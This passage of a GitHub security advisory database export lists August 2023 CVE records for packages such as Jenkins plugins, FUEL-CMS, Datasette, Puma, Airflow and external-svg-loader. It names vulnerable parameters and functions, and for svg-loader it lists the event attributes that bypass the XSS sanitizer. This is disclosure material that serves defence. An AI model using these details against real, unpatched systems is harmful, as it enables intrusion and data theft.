'url': 'https://github.com/go-gitea/gitea/pull/20892'}, {'type': 'WEB', 'url': 'https://blog.gitea.com/release-of-1.17.2/'}, {'type': 'PACKAGE', 'url': 'https://github.com/go-gitea/gitea'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:40:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-g4pq-p927-7pgg,2023-08-16T21:08:50Z,2023-08-16T15:30:18Z,,['CVE-2023-40341'],Jenkins Blue Ocean Plugin cross-site request forgery vulnerability,"Jenkins Blue Ocean Plugin 1.27.5 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to connect to an attacker-specified URL, capturing GitHub credentials associated with an attacker-specified job. This issue is due to an incomplete fix of SECURITY-2502. Blue Ocean Plugin 1.27.5.1 uses the configured SCM URL, instead of a user-specified URL provided as a parameter to the HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.blueocean:blueocean'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.27.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40341'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3116'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:08:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-7rvp-xqj7-rxf2,2023-08-16T19:25:56Z,2023-08-11T15:30:46Z,,['CVE-2020-24950'],Daylight Studio FUEL-CMS SQLi Vulnerability,"SQL Injection vulnerability in file `Base_module_model.php` in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the `col` parameter to function `list_items`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'codeigniter/framework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24950'}, {'type': 'WEB', 'url': 'https://github.com/daylightstudio/FUEL-CMS/issues/562'}, {'type': 'WEB', 'url': 'https://github.com/daylightstudio/FUEL-CMS/commit/c8d9381d39b1c0f5488cf059ea9aa659ee227da4'}, {'type': 'PACKAGE', 'url': 'https://github.com/daylightstudio/FUEL-CMS/'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:22:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-7ch3-7pp7-7cpq,2023-08-25T16:08:10Z,2023-08-22T18:06:46Z,,['CVE-2023-40570'],Datasette 1.0 alpha series leaks names of databases and tables to unauthenticated users,"### Impact This bug affects Datasette instances running a Datasette 1.0 alpha - 1.0a0, 1.0a1, 1.0a2 or 1.0a3 - in an online accessible location but with authentication enabled using a plugin such as [datasette-auth-passwords](https://datasette.io/plugins/datasette-auth-passwords). The `/-/api` API explorer endpoint could reveal the names of both databases and tables - but not their contents - to an unauthenticated user. ### Patches Datasette 1.0a4 has a fix for this issue. ### Workarounds To work around this issue, block all traffic to the `/-/api` endpoint. This can be done with a proxy such as Apache or NGINX, or by installing the [datasette-block](https://datasette.io/plugins/datasette-block) plugin and adding the following configuration to your `metadata.json` or `metadata.yml` file: ```json { ""plugins"": { ""datasette-block"": { ""prefixes"": [""/-/api""] } } } ``` This will block access to the API explorer but will still allow access to the Datasette read or write JSON APIs, as those use different URL patterns within the Datasette `/database` hierarchy.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'datasette'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0a0'}, {'fixed': '1.0a4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simonw/datasette/security/advisories/GHSA-7ch3-7pp7-7cpq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40570'}, {'type': 'WEB', 'url': 'https://github.com/simonw/datasette/commit/01e0558825b8f7ec17d3b691aa072daf122fcc74'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/datasette/PYSEC-2023-154.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/simonw/datasette'}]","{'cwe_ids': ['CWE-200', 'CWE-213'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T18:06:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-36fg-whr2-g999,2023-08-16T21:13:10Z,2023-08-16T15:30:18Z,,['CVE-2023-40340'],Jenkins NodeJS Plugin improper credential masking vulnerability,"Jenkins NodeJS Plugin integrates with Config File Provider Plugin to specify custom NPM settings, including credentials for authentication, in a Npm config file. NodeJS Plugin 1.6.0 and earlier does not properly mask (i.e., replace with asterisks) credentials specified in the Npm config file in Pipeline build logs. NodeJS Plugin 1.6.0.1 masks credentials specified in the Npm config file in Pipeline build logs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:nodejs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40340'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3196'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:13:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-68xg-gqqm-vgj8,2023-08-24T22:34:11Z,2023-08-18T21:50:05Z,,['CVE-2023-40175'],Puma HTTP Request/Response Smuggling vulnerability,"### Impact Prior to version 6.3.1, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies and zero-length Content-Length headers in a way that allowed HTTP request smuggling. The following vulnerabilities are addressed by this advisory: * Incorrect parsing of trailing fields in chunked transfer encoding bodies * Parsing of blank/zero-length Content-Length headers ### Patches The vulnerability has been fixed in 6.3.1 and 5.6.7. ### Workarounds No known workarounds. ### References [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling) ### For more information If you have any questions or comments about this advisory: Open an issue in [Puma](https://github.com/puma/puma) See our [security policy](https://github.com/puma/puma/security/policy) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.7'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-68xg-gqqm-vgj8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40175'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/690155e7d644b80eeef0a6094f9826ee41f1080a'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/7405a219801dcebc0ad6e0aa108d4319ca23f662'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/ed0f2f94b56982c687452504b95d5f1fbbe3eed1'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/releases/tag/v5.6.7'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/releases/tag/v6.3.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2023-40175.yml'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T21:50:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-v9rw-hjr3-426h,2023-08-16T21:05:21Z,2023-08-16T15:30:18Z,,['CVE-2023-40350'],Jenkins Docker Swarm Plugin stored cross-site scripting vulnerability,"Jenkins Docker Swarm Plugin processes Docker responses to generate the Docker Swarm Dashboard view. Docker Swarm Plugin 1.11 and earlier does not escape values returned from Docker before inserting them into the Docker Swarm Dashboard view. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control responses from Docker. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:docker-swarm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40350'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-2811'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:05:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-8q28-pw9g-w82c,2023-09-06T19:15:14Z,2023-08-28T09:30:20Z,,['CVE-2023-40195'],Apache Airflow vulnerable arbitrary code execution via Spark server,"Deserialization of Untrusted Data, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Software Foundation Apache Airflow Spark Provider. When the Apache Spark provider is installed on an Airflow deployment, an Airflow user that is authorized to configure Spark hooks can effectively run arbitrary code on the Airflow node by pointing it at a malicious Spark server. Prior to version 4.1.3, this was not called out in the documentation explicitly, so it is possible that administrators provided authorizations to configure Spark hooks without taking this into account. We recommend administrators to review their configurations to make sure the authorization to configure Spark hooks is only provided to fully trusted users. To view the warning in the docs please visit  https://airflow.apache.org/docs/apache-airflow-providers-apache-spark/4.1.3/connections/spark.html ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-spark'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.1.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40195'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33233'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/6850b5c777fa515e110ad1daa85242209a8ec6c0'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow-providers-apache-spark/PYSEC-2023-156.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/fzy95b1d6zv31j5wrx3znhzcscck2o24'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:13:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-xc2r-jf2x-gjr8,2023-08-14T21:32:27Z,2023-08-14T21:32:27Z,,['CVE-2023-40013'],external-svg-loader Cross-site Scripting vulnerability,"### Summary According to the [docs](https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript), svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS. ### Details When trying to sanitize the svg the lib [removes event attributes](https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128) such as `onmouseover`, `onclick` but the list of events is not exhaustive. Here's a list of events not removed by svg-loader. `onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart` As you can see in the POC we can use `onbegin` in `animate` tag to execute JS code without needing to add `data-js=""enabled""`. ### PoC ```html ``` ```html ``` ### Impact Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'external-svg-loader'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shubhamjain/svg-loader/security/advisories/GHSA-xc2r-jf2x-gjr8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40013'}, {'type': 'WEB', 'url': 'https://github.com/shubhamjain/svg-loader/commit/d3562fc08497aec5f33eb82017fa1417b3319e2c'}, {'type': 'PACKAGE', 'url': 'https://github.com/shubhamjain/svg-loader'}, {'type': 'WEB', 'url': 'https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128'}, {'type': 'WEB', 'url': 'https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:32:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-g4vp-m682-qqmp,2023-08-11T19:00:48Z,2023-08-11T19:00:48Z,,['CVE-2023-40014'],OpenZeppelin Contracts vulnerable to Improper Escaping of Output,"### Impact OpenZeppelin Contracts is a library for secure smart contract development. Starting in version 4.0.0 and prior to version 4.9.3, contracts using `ERC2771Context` along with a custom trusted forwarder may see `_msgSender` return `address(0)` in calls that originate from the forwarder with calldata shorter than 20 bytes. This combination of circumstances does not appear to be common, in particular it is not the case for `MinimalForwarder` from OpenZeppelin Contracts, or any deployed forwarder the team is aware of, given that the signer address is appended to all calls that originate from these forwarders. ### Patches The problem has been patched in v4.9.3. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.9.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-g4vp-m682-qqmp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40014'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/pull/4481'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/pull/4484'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/9445f96223041abf2bf08daa56f8da50b674cbcd'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/e4435eed757d4309436b1e06608e97b6d6e2fdb5'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/v4.9.3/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/releases/tag/v4.9.3'}]","{'cwe_ids': ['CWE-116'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T19:00:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-wrw3-qmqw-4x9w,2023-08-17T19:08:14Z,2023-08-08T18:30:35Z,,['CVE-2023-38759'],wger Workout Manager Cross-Site Request Forgery vulnerability,"Cross Site Request Forgery (CSRF) vulnerability in wger Project wger Workout Manager 2.2.0a3 allows a remote attacker to gain privileges via the `user-management` feature in the `gym/views/gym.py`, `templates/gym/reset_user_password.html`, `templates/user/overview.html`, `core/views/user.py`, and `templates/user/preferences.html`, `core/forms.py` components.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wger'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0a3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38759'}, {'type': 'WEB', 'url': 'https://github.com/0x72303074/CVE-Disclosures'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/wger/PYSEC-2023-144.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/wger-project/wger'}, {'type': 'WEB', 'url': 'https://wger.de'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-17T19:08:14Z', 'nvd_published_at': None}" 1.4.0,GHSA-jcf2-mxr2-gmqp,2023-08-25T21:35:52Z,2023-08-25T19:45:57Z,,['CVE-2023-40579'],OpenFGA Authorization Bypass,"## Overview Some end users of OpenFGA v1.3.0 or earlier are vulnerable to authorization bypass when calling the ListObjects API. UPDATE: This means that the API sometimes returns more objects than it should. ## Am I Affected? The vulnerability affects customers using `ListObjects` with specific models. The affected models contain expressions of type `rel1 from type1`. ## Fix Update to v1.3.1. ## Backward Compatibility This update is backward compatible. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/openfga/openfga'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/openfga/openfga/security/advisories/GHSA-jcf2-mxr2-gmqp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40579'}, {'type': 'PACKAGE', 'url': 'https://github.com/openfga/openfga'}, {'type': 'WEB', 'url': 'https://github.com/openfga/openfga/releases/tag/v1.3.1'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T19:45:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-5f35-pq34-c87q,2023-08-29T22:37:25Z,2023-08-23T18:30:34Z,,['CVE-2023-39441'],Apache Airflow missing Certificate Validation,"Apache Airflow SMTP Provider before 1.3.0, Apache Airflow IMAP Provider before 3.3.0, and Apache Airflow before 2.7.0 are affected by the Validation of OpenSSL Certificate vulnerability. The default SSL context with SSL library did not check a server's X.509 certificate.  Instead, the code accepted any certificate, which could result in the disclosure of mail server credentials or mail contents when the client connects to an attacker in a MITM position. Users are strongly advised to upgrade to Apache Airflow version 2.7.0 or newer, Apache Airflow IMAP Provider version 3.3.0 or newer, and Apache Airflow SMTP Provider version 1.3.0 or newer to mitigate the risk associated with this vulnerability","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-smtp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-imap'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39441'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33070'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33075'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33108'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/xzp4wgjg2b1o6ylk2595df8bstlbo1lb'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/23/2'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T12:52:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-34hj-v8fm-x887,2023-08-04T13:31:13Z,2023-08-03T16:33:32Z,,['CVE-2023-38708'],Pimcore Path Traversal Vulnerability in AssetController:importServerFilesAction,"### Impact A path traversal vulnerability exists in the `AssetController::importServerFilesAction`, which allows an attacker to overwrite or modify sensitive files by manipulating the pimcore_log parameter.This can lead to potential denial of service---key file overwrite. The impact of this vulnerability allows attackers to: Overwrite or modify sensitive files, potentially leading to unauthorized access, privilege escalation, or disclosure of confidential information. Tamper with system settings by modifying key files, such as the hosts file in Windows or configuration files for other services. Cause a denial of service (DoS) if critical system files are overwritten or deleted. The consequences of exploiting this vulnerability can be detrimental to the confidentiality, integrity, and availability of the affected system. It's crucial to address this vulnerability to protect sensitive data and ensure the proper functioning of the system. ### Patches Update to version 10.6.7 or apply this patch manually https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c.patch ### Workarounds Apply patch https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c.patch manually. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-34hj-v8fm-x887'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38708'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:33:32Z', 'nvd_published_at': None}" 1.4.0,GHSA-gpvc-mx6g-cchv,2023-08-01T19:47:09Z,2023-08-01T06:30:15Z,,['CVE-2023-26139'],underscore-keypath vulnerable to Prototype Pollution,Versions of the package underscore-keypath from 0.0.11 are vulnerable to Prototype Pollution via the name argument of the `setProperty()` function. Exploiting this vulnerability is possible due to improper input sanitization which allows the usage of arguments like `__proto__`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'underscore-keypath'}, 'ecosystem_specific': {'affected_functions': ['underscore-keypath.setValueForKeyPath']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.11'}, {'last_affected': '0.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26139'}, {'type': 'WEB', 'url': 'https://gist.github.com/lelecolacola123/cc0d1e73780127aea9482c05f2ff3252'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeeeyul/underscore-keypath'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-UNDERSCOREKEYPATH-5416714'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:47:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-4847-gqxx-v9xp,2023-08-16T19:26:04Z,2023-08-11T15:30:46Z,,['CVE-2020-25915'],ThinkCMF Cross-site Scripting Vulnerability,"Cross Site Scripting (XSS) vulnerability in `UserController.php` in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted `user_login`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thinkcmf/thinkcmf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25915'}, {'type': 'WEB', 'url': 'https://github.com/thinkcmf/thinkcmf/issues/675'}, {'type': 'WEB', 'url': 'https://github.com/thinkcmf/thinkcmf/commit/27e1fbea5aed5619d15c1257614df45298f04436'}, {'type': 'PACKAGE', 'url': 'https://github.com/thinkcmf/thinkcmf'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:27:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-xvhg-w6qc-m3qq,2023-08-21T19:32:51Z,2023-08-15T20:08:17Z,,['CVE-2023-40023'],Yaklang Plugin's Fuzztag Component Allows Unauthorized Local File Reading,"### Impact The Yak Engine has been found to contain a local file inclusion (LFI) vulnerability. This vulnerability allows attackers to include files from the server's local file system through the web application. When exploited, this can lead to the unintended exposure of sensitive data, potential remote code execution, or other security breaches. Users utilizing versions of the Yak Engine prior to 1.2.4-sp1 are impacted. ### Patches The vulnerability has been addressed and patched. Users are advised to upgrade to Yak Engine version 1.2.4-sp1 immediately. The patch can be viewed and reviewed at this PR: [https://github.com/yaklang/yaklang/pull/295](https://github.com/yaklang/yaklang/pull/295),[https://github.com/yaklang/yaklang/pull/296](https://github.com/yaklang/yaklang/pull/296) ### Workarounds Currently, the most effective solution is to upgrade to the patched version of Yak Engine (1.2.4-sp1). Users are also advised to avoid exposing vulnerable versions to untrusted input and to closely monitor any unexpected server behavior until they can upgrade. ### References For more details on the vulnerability and the corresponding patch, please visit the following link: - [PR addressing the LFI vulnerability in Yak Engine](https://github.com/yaklang/yaklang/pull/295) - [disable default file fuzztag in fuzz.Pool](https://github.com/yaklang/yaklang/pull/296) - [利用yakit功能特性溯源攻击者](https://mp.weixin.qq.com/s?__biz=Mzg5ODE3NTU1OQ==&mid=2247484236&idx=1&sn=ef0c14a89721800b2311d0e487388399)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/yaklang/yaklang'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4-sp2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/yaklang/yaklang/security/advisories/GHSA-xvhg-w6qc-m3qq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40023'}, {'type': 'WEB', 'url': 'https://github.com/yaklang/yaklang/pull/295'}, {'type': 'WEB', 'url': 'https://github.com/yaklang/yaklang/pull/296'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaklang/yaklang'}, {'type': 'WEB', 'url': 'https://mp.weixin.qq.com/s?__biz=Mzg5ODE3NTU1OQ==&mid=2247484236&idx=1&sn=ef0c14a89721800b2311d0e487388399'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:08:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-c3x7-354f-4p2x,2023-08-09T13:17:53Z,2023-08-09T13:17:53Z,,['CVE-2023-4241'],lol-html panics on certain HTML inputs,"### Impact lol-html can cause panics on certain HTML inputs. Anyone processing arbitrary 3rd party HTML with the library is affected. ### Patches 